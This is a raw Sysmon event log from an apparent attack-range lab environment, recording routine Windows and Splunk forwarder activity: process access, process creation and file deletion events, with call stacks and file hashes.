07:42:26.278{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805757Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.278{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F262-60EB-3079-00000000D001}1624C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805756Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.278{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F262-60EB-3079-00000000D001}1624C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805755Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.279{0C1E0330-F262-60EB-3079-00000000D001}1624C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000805754Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.216{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A9320FF155E77DC9EB6DA7928AF4A6F,SHA256=BA21060588E57AF608CB8FC3550B46C81C7F1F91408819F0FBFAC10C2A84C712,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045513Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:27.379{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=024788F206702B1A01457F794970CA6F,SHA256=106ABEBFD3A3C2BCBB8C35E8774AAA9A9C2B4308AF35335A594D81B83317CC76,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000805797Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.794{0C1E0330-F263-60EB-3279-00000000D001}292640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805796Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.653{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F263-60EB-3279-00000000D001}292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805795Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.653{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805794Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.653{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805793Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.653{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805792Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.653{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805791Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.653{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805790Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.653{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805789Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.653{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805788Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.653{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805787Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.653{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805786Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.653{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F263-60EB-3279-00000000D001}292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805785Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.653{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F263-60EB-3279-00000000D001}292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805784Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.638{0C1E0330-F263-60EB-3279-00000000D001}292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000805783Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.325{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94EBC934F1C61B73178FB8C6C81AF357,SHA256=7C8549DCFF11065079D6DFEF916F97E60AC0E8BDC2A7C43FBE9B186C9B6E7BCC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000805782Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.122{0C1E0330-F262-60EB-3179-00000000D001}33162436C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001045514Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:28.379{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06EAC5C7619DA2A9444BCD9D12BD2602,SHA256=013B05B7FB13750364E1DA7587BE433DD0599F3314B463DEDE16A7E146921479,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805813Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.622{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D13D78B777C32821DF5949761D286235,SHA256=575E33BCE72160CB0A547A397A5E1DD0580DD297DD26D2BA233BF9E74E57FB0A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000805812Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.497{0C1E0330-F264-60EB-3379-00000000D001}416404C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805811Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.357{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F264-60EB-3379-00000000D001}416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805810Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805809Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805808Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805807Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntd